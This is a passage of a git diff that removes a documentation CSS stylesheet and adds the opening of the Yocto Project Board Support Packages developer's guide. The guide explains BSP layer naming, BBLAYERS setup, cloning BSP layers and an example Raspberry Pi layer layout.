- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-.writernotes {
- color: red;
-}
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title {
- background-position: bottom;
- background-repeat: repeat-x;
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/bsp-guide/bsp.rst b/documentation/bsp-guide/bsp.rst
new file mode 100644
index 0000000000..efb5328911
--- /dev/null
+++ b/documentation/bsp-guide/bsp.rst
@@ -0,0 +1,1532 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************************************
+Board Support Packages (BSP) - Developer's Guide
+************************************************
+
+A Board Support Package (BSP) is a collection of information that
+defines how to support a particular hardware device, set of devices, or
+hardware platform. The BSP includes information about the hardware
+features present on the device and kernel configuration information
+along with any additional hardware drivers required. The BSP also lists
+any additional software components required in addition to a generic
+Linux software stack for both essential and optional platform features.
+
+This guide presents information about BSP layers, defines a structure
+for components so that BSPs follow a commonly understood layout,
+discusses how to customize a recipe for a BSP, addresses BSP licensing,
+and provides information that shows you how to create a BSP
+Layer using the :ref:`bitbake-layers <bsp-guide/bsp:Creating a new BSP Layer Using the \`\`bitbake-layers\`\` Script>`
+tool.
+
+BSP Layers
+==========
+
+A BSP consists of a file structure inside a base directory.
+Collectively, you can think of the base directory, its file structure,
+and the contents as a BSP layer. Although not a strict requirement, BSP
+layers in the Yocto Project use the following well-established naming
+convention: ::
+
+ meta-bsp_root_name
+
+The string "meta-" is prepended to the
+machine or platform name, which is "bsp_root_name" in the above form.
+
+.. note::
+
+ Because the BSP layer naming convention is well-established, it is
+ advisable to follow it when creating layers. Technically speaking, a
+ BSP layer name does not need to start with ``meta-``.
+ However, various scripts and tools in the Yocto Project development
+ environment assume this convention.
+
+To help understand the BSP layer concept, consider the BSPs that the
+Yocto Project supports and provides with each release. You can see the
+layers in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+through
+a web interface at :yocto_git:`/`. If you go to that interface,
+you will find a list of repositories under "Yocto Metadata Layers".
+
+.. note::
+
+ Layers that are no longer actively supported as part of the Yocto
+ Project appear under the heading "Yocto Metadata Layer Archive."
+
+Each repository is a BSP layer supported by the Yocto Project (e.g.
+``meta-raspberrypi`` and ``meta-intel``). Each of these layers is a
+repository unto itself and clicking on the layer name displays two URLs
+from which you can clone the layer's repository to your local system.
+Here is an example that clones the Raspberry Pi BSP layer: ::
+
+ $ git clone git://git.yoctoproject.org/meta-raspberrypi
+
+In addition to BSP layers, the ``meta-yocto-bsp`` layer is part of the
+shipped ``poky`` repository. The ``meta-yocto-bsp`` layer maintains
+several "reference" BSPs including the ARM-based Beaglebone, MIPS-based
+EdgeRouter, and generic versions of both 32-bit and 64-bit IA machines.
+
+For information on typical BSP development workflow, see the
+:ref:`bsp-guide/bsp:developing a board support package (bsp)`
+section. For more
+information on how to set up a local copy of source files from a Git
+repository, see the
+:ref:`dev-manual/dev-manual-start:locating yocto project source files`
+section in the Yocto Project Development Tasks Manual.
+
+The BSP layer's base directory (``meta-bsp_root_name``) is the root
+directory of that Layer. This directory is what you add to the
+:term:`BBLAYERS` variable in the
+``conf/bblayers.conf`` file found in your
+:term:`Build Directory`, which is
+established after you run the OpenEmbedded build environment setup
+script (i.e. :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``).
+Adding the root directory allows the :term:`OpenEmbedded Build System`
+to recognize the BSP
+layer and from it build an image. Here is an example: ::
+
+ BBLAYERS ?= " \
+ /usr/local/src/yocto/meta \
+ /usr/local/src/yocto/meta-poky \
+ /usr/local/src/yocto/meta-yocto-bsp \
+ /usr/local/src/yocto/meta-mylayer \
+ "
+
+.. note::
+
+ Ordering and :term:`BBFILE_PRIORITY` for the layers listed in ``BBLAYERS``
+ matter. For example, if multiple layers define a machine configuration, the
+ OpenEmbedded build system uses the last layer searched given similar layer
+ priorities. The build system works from the top-down through the layers
+ listed in ``BBLAYERS``.
+
+Some BSPs require or depend on additional layers beyond the BSP's root
+layer in order to be functional. In this case, you need to specify these
+layers in the ``README`` "Dependencies" section of the BSP's root layer.
+Additionally, if any build instructions exist for the BSP, you must add
+them to the "Dependencies" section.
+
+Some layers function as a layer to hold other BSP layers. These layers
+are known as ":term:`container layers <Container Layer>`". An example of
+this type of layer is OpenEmbedded's
+`meta-openembedded <https://github.com/openembedded/meta-openembedded>`__
+layer. The ``meta-openembedded`` layer contains many ``meta-*`` layers.
+In cases like this, you need to include the names of the actual layers
+you want to work with, such as: ::
+
+ BBLAYERS ?= " \
+ /usr/local/src/yocto/meta \
+ /usr/local/src/yocto/meta-poky \
+ /usr/local/src/yocto/meta-yocto-bsp \
+ /usr/local/src/yocto/meta-mylayer \
+ .../meta-openembedded/meta-oe \
+ .../meta-openembedded/meta-perl \
+ .../meta-openembedded/meta-networking \
+ "
+
+and so on.
+
+For more information on layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+Preparing Your Build Host to Work With BSP Layers
+=================================================
+
+This section describes how to get your build host ready to work with BSP
+layers. Once you have the host set up, you can create the layer as
+described in the
+":ref:`bsp-guide/bsp:creating a new bsp layer using the \`\`bitbake-layers\`\` script`"
+section.
+
+.. note::
+
+ For structural information on BSPs, see the
+ :ref:`bsp-guide/bsp:example filesystem layout` section.
+
+#. *Set Up the Build Environment:* Be sure you are set up to use BitBake
+ in a shell. See the ":ref:`dev-manual/dev-manual-start:preparing the build host`"
+ section in the Yocto Project Development Tasks Manual for information on how
+ to get a build host ready that is either a native Linux machine or a machine
+ that uses CROPS.
+
+#. *Clone the poky Repository:* You need to have a local copy of the
+ Yocto Project :term:`Source Directory` (i.e. a local
+ ``poky`` repository). See the
+ ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" and
+ possibly the
+ ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" or
+ ":ref:`dev-manual/dev-manual-start:checking out by tag in poky`"
+ sections
+ all in the Yocto Project Development Tasks Manual for information on
+ how to clone the ``poky`` repository and check out the appropriate
+ branch for your work.
+
+#. *Determine the BSP Layer You Want:* The Yocto Project supports many
+ BSPs, which are maintained in their own layers or in layers designed
+ to contain several BSPs. To get an idea of machine support through
+ BSP layers, you can look at the
+ :yocto_dl:`index of machines </releases/yocto/&DISTRO_REL_TAG;/machines>`
+ for the release.
+
+#. *Optionally Clone the meta-intel BSP Layer:* If your hardware is
+ based on current Intel CPUs and devices, you can leverage this BSP
+ layer. For details on the ``meta-intel`` BSP layer, see the layer's
+ `README <http://git.yoctoproject.org/cgit/cgit.cgi/meta-intel/tree/README>`__
+ file.
+
+ #. *Navigate to Your Source Directory:* Typically, you set up the
+ ``meta-intel`` Git repository inside the :term:`Source Directory` (e.g.
+ ``poky``). ::
+
+ $ cd /home/you/poky
+
+ #. *Clone the Layer:* ::
+
+ $ git clone git://git.yoctoproject.org/meta-intel.git
+ Cloning into 'meta-intel'...
+ remote: Counting objects: 15585, done.
+ remote: Compressing objects: 100% (5056/5056), done.
+ remote: Total 15585 (delta 9123), reused 15329 (delta 8867)
+ Receiving objects: 100% (15585/15585), 4.51 MiB | 3.19 MiB/s, done.
+ Resolving deltas: 100% (9123/9123), done.
+ Checking connectivity... done.
+
+ #. *Check Out the Proper Branch:* The branch you check out for
+ ``meta-intel`` must match the same branch you are using for the
+ Yocto Project release (e.g. ``&DISTRO_NAME_NO_CAP;``): ::
+
+ $ cd meta-intel
+ $ git checkout -b &DISTRO_NAME_NO_CAP; remotes/origin/&DISTRO_NAME_NO_CAP;
+ Branch &DISTRO_NAME_NO_CAP; set up to track remote branch
+ &DISTRO_NAME_NO_CAP; from origin.
+ Switched to a new branch '&DISTRO_NAME_NO_CAP;'
+
+ .. note::
+
+ To see the available branch names in a cloned repository, use the ``git
+ branch -al`` command. See the
+ ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`"
+ section in the Yocto Project Development Tasks Manual for more
+ information.
+
+#. *Optionally Set Up an Alternative BSP Layer:* If your hardware can be
+ more closely leveraged to an existing BSP not within the
+ ``meta-intel`` BSP layer, you can clone that BSP layer.
+
+ The process is identical to the process used for the ``meta-intel``
+ layer except for the layer's name. For example, if you determine that
+ your hardware most closely matches the ``meta-raspberrypi``, clone
+ that layer: ::
+
+ $ git clone git://git.yoctoproject.org/meta-raspberrypi
+ Cloning into 'meta-raspberrypi'...
+ remote: Counting objects: 4743, done.
+ remote: Compressing objects: 100% (2185/2185), done.
+ remote: Total 4743 (delta 2447), reused 4496 (delta 2258)
+ Receiving objects: 100% (4743/4743), 1.18 MiB | 0 bytes/s, done.
+ Resolving deltas: 100% (2447/2447), done.
+ Checking connectivity... done.
+
+#. *Initialize the Build Environment:* While in the root directory of
+ the Source Directory (i.e. ``poky``), run the
+ :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\`` environment
+ setup script to define the OpenEmbedded build environment on your
+ build host. ::
+
+ $ source oe-init-build-env
+
+ Among other things, the script creates the :term:`Build Directory`, which is
+ ``build`` in this case and is located in the :term:`Source Directory`. After
+ the script runs, your current working directory is set to the ``build``
+ directory.
+
+.. _bsp-filelayout:
+
+Example Filesystem Layout
+=========================
+
+Defining a common BSP directory structure allows end-users to understand
+and become familiar with that standard. A common format also encourages
+standardization of software support for hardware.
+
+The proposed form described in this section does have elements that are
+specific to the OpenEmbedded build system. It is intended that
+developers can use this structure with other build systems besides the
+OpenEmbedded build system. It is also intended that it will be be simple
+to extract information and convert it to other formats if required. The
+OpenEmbedded build system, through its standard :ref:`layers mechanism
+<overview-manual/overview-manual-yp-intro:the yocto project layer model>`, can
+directly accept the format described as a layer. The BSP layer captures
+all the hardware-specific details in one place using a standard format,
+which is useful for any person wishing to use the hardware platform
+regardless of the build system they are using.
+
+The BSP specification does not include a build system or other tools -
+the specification is concerned with the hardware-specific components
+only. At the end-distribution point, you can ship the BSP layer combined
+with a build system and other tools. Realize that it is important to
+maintain the distinction that the BSP layer, a build system, and tools
+are separate components that could be combined in certain end products.
+
+Before looking at the recommended form for the directory structure
+inside a BSP layer, you should be aware that some requirements do exist
+in order for a BSP layer to be considered compliant with the Yocto
+Project. For that list of requirements, see the
+":ref:`bsp-guide/bsp:released bsp requirements`" section.
+
+Below is the typical directory structure for a BSP layer. While this
+basic form represents the standard, realize that the actual layout for
+individual BSPs could differ. ::
+
+ meta-bsp_root_name/
+ meta-bsp_root_name/bsp_license_file
+ meta-bsp_root_name/README
+ meta-bsp_root_name/README.sources
+ meta-bsp_root_name/binary/bootable_images
+ meta-bsp_root_name/conf/layer.conf
+ meta-bsp_root_name/conf/machine/*.conf
+ meta-bsp_root_name/recipes-bsp/*
+ meta-bsp_root_name/recipes-core/*
+ meta-bsp_root_name/recipes-graphics/*
+ meta-bsp_root_name/recipes-kernel/linux/linux-yocto_kernel_rev.bbappend
+
+Below is an example of the Raspberry Pi BSP layer that is available from
+the :yocto_git:`Source Respositories <>`:
+
+.. code-block:: none
+
+ meta-raspberrypi/COPYING.MIT
+ meta-raspberrypi/README.md
+ meta-raspberrypi/classes
+ meta-raspberrypi/classes/sdcard_image-rpi.bbclass
+ meta-raspberrypi/conf/
+ meta-raspberrypi/conf/layer.conf
+ meta-raspberrypi/conf/machine/
+ meta-raspberrypi/conf/machine/raspberrypi-cm.conf
+ meta-raspberrypi/conf/machine/raspberrypi-cm3.conf
+ meta-raspberrypi/conf/machine/raspberrypi.conf
+ meta-raspberrypi/conf/machine/raspberrypi0-wifi.conf
+ meta-raspberrypi/conf/machine/raspberrypi0.conf
+ meta-raspberrypi/conf/machine/raspberrypi2.conf
+ meta-raspberrypi/conf/machine/raspberrypi3-64.conf
+ meta-raspberrypi/conf/machine/raspberrypi3.conf
+ meta-raspberrypi/conf/machine/include
+ meta-raspberrypi/conf/machine/include/rpi-base.inc
+ meta-raspberrypi/conf/machine/include/rpi-default-providers.inc
+ meta-raspberrypi/conf/machine/include/rpi-default-settings.inc
+ meta-raspberrypi/conf/machine/include/rpi-default-versions.inc
+ meta-raspberrypi/conf/machine/include/tune-arm1176jzf-s.inc
+ meta-raspberrypi/docs
+ meta-raspberrypi/docs/Makefile
+ meta-raspberrypi/docs/conf.py
+ meta-raspberrypi/docs/contributing.md
+ meta-raspberrypi/docs/extra-apps.md
+ meta-raspberrypi/docs/extra-build-config.md
+ meta-raspberrypi/docs/index.rst
+ meta-raspberrypi/docs/layer-contents.md
+ meta-raspberrypi/docs/readme.md
+ meta-raspberrypi/files
+ meta-raspberrypi/files/custom-licenses
+ meta-raspberrypi/files/custom-licenses/Broadcom
+ meta-raspberrypi/recipes-bsp
+ meta-raspberrypi/recipes-bsp/bootfiles
+ meta-raspberrypi/recipes-bsp/bootfiles/bcm2835-bootfiles.bb
+ meta-raspberrypi/recipes-bsp/bootfiles/rpi-config_git.bb
+ meta-raspberrypi/recipes-bsp/common
+ meta-raspberrypi/recipes-bsp/common/firmware.inc
+ meta-raspberrypi/recipes-bsp/formfactor
+ meta-raspberrypi/recipes-bsp/formfactor/formfactor
+ meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi
+ meta-raspberrypi/recipes-bsp/formfactor/formfactor/raspberrypi/machconfig
+ meta-raspberrypi/recipes-bsp/formfactor/formfactor_0.0.bbappend
+ meta-raspberrypi/recipes-bsp/rpi-u-boot-src
+ meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files
+ meta-raspberrypi/recipes-bsp/rpi-u-boot-src/files/boot.cmd.in
+ meta-raspberrypi/recipes-bsp/rpi-u-boot-src/rpi-u-boot-scr.bb
+ meta-raspberrypi/recipes-bsp/u-boot
+ meta-raspberrypi/recipes-bsp/u-boot/u-boot
+ meta-raspberrypi/recipes-bsp/u-boot/u-boot/*.patch
+ meta-raspberrypi/recipes-bsp/u-boot/u-boot_%.bbappend
+ meta-raspberrypi/recipes-connectivity
+ meta-raspberrypi/recipes-connectivity/bluez5
+ meta-raspberrypi/recipes-connectivity/bluez5/bluez5
+ meta-raspberrypi/recipes-connectivity/bluez5/bluez5/*.patch
+ meta-raspberrypi/recipes-connectivity/bluez5/bluez5/BCM43430A1.hcd
+ meta-raspberrypi/recipes-connectivity/bluez5/bluez5brcm43438.service
+ meta-raspberrypi/recipes-connectivity/bluez5/bluez5_%.bbappend
+ meta-raspberrypi/recipes-core
+ meta-raspberrypi/recipes-core/images
+ meta-raspberrypi/recipes-core/images/rpi-basic-image.bb
+ meta-raspberrypi/recipes-core/images/rpi-hwup-image.bb
+ meta-raspberrypi/recipes-core/images/rpi-test-image.bb
+ meta-raspberrypi/recipes-core/packagegroups
+ meta-raspberrypi/recipes-core/packagegroups/packagegroup-rpi-test.bb
+ meta-raspberrypi/recipes-core/psplash
+ meta-raspberrypi/recipes-core/psplash/files
+ meta-raspberrypi/recipes-core/psplash/files/psplash-raspberrypi-img.h
+ meta-raspberrypi/recipes-core/psplash/psplash_git.bbappend
+ meta-raspberrypi/recipes-core/udev
+ meta-raspberrypi/recipes-core/udev/udev-rules-rpi
+ meta-raspberrypi/recipes-core/udev/udev-rules-rpi/99-com.rules
+ meta-raspberrypi/recipes-core/udev/udev-rules-rpi.bb
+ meta-raspberrypi/recipes-devtools
+ meta-raspberrypi/recipes-devtools/bcm2835
+ meta-raspberrypi/recipes-devtools/bcm2835/bcm2835_1.52.bb
+ meta-raspberrypi/recipes-devtools/pi-blaster
+ meta-raspberrypi/recipes-devtools/pi-blaster/files
+ meta-raspberrypi/recipes-devtools/pi-blaster/files/*.patch
+ meta-raspberrypi/recipes-devtools/pi-blaster/pi-blaster_git.bb
+ meta-raspberrypi/recipes-devtools/python
+ meta-raspberrypi/recipes-devtools/python/python-rtimu
+ meta-raspberrypi/recipes-devtools/python/python-rtimu/*.patch
+ meta-raspberrypi/recipes-devtools/python/python-rtimu_git.bb
+ meta-raspberrypi/recipes-devtools/python/python-sense-hat_2.2.0.bb
+ meta-raspberrypi/recipes-devtools/python/rpi-gpio
+ meta-raspberrypi/recipes-devtools/python/rpi-gpio/*.patch
+ meta-raspberrypi/recipes-devtools/python/rpi-gpio_0.6.3.bb
+ meta-raspberrypi/recipes-devtools/python/rpio
+ meta-raspberrypi/recipes-devtools/python/rpio/*.patch
+ meta-raspberrypi/recipes-devtools/python/rpio_0.10.0.bb
+ meta-raspberrypi/recipes-devtools/wiringPi
+ meta-raspberrypi/recipes-devtools/wiringPi/files
+ meta-raspberrypi/recipes-devtools/wiringPi/files/*.patch
+ meta-raspberrypi/recipes-devtools/wiringPi/wiringpi_git.bb
+ meta-raspberrypi/recipes-graphics
+ meta-raspberrypi/recipes-graphics/eglinfo
+ meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-fb_%.bbappend
+ meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-x11_%.bbappend
+ meta-raspberrypi/recipes-graphics/mesa
+ meta-raspberrypi/recipes-graphics/mesa/mesa-gl_%.bbappend
+ meta-raspberrypi/recipes-graphics/mesa/mesa_%.bbappend
+ meta-raspberrypi/recipes-graphics/userland
+ meta-raspberrypi/recipes-graphics/userland/userland
+ meta-raspberrypi/recipes-graphics/userland/userland/*.patch
+ meta-raspberrypi/recipes-graphics/userland/userland_git.bb
+ meta-raspberrypi/recipes-graphics/vc-graphics
+ meta-raspberrypi/recipes-graphics/vc-graphics/files
+ meta-raspberrypi/recipes-graphics/vc-graphics/files/egl.pc
+ meta-raspberrypi/recipes-graphics/vc-graphics/files/vchiq.sh
+ meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics-hardfp.bb
+ meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.bb
+ meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.inc
+ meta-raspberrypi/recipes-graphics/wayland
+ meta-raspberrypi/recipes-graphics/wayland/weston_%.bbappend
+ meta-raspberrypi/recipes-graphics/xorg-xserver
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config
+ meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi
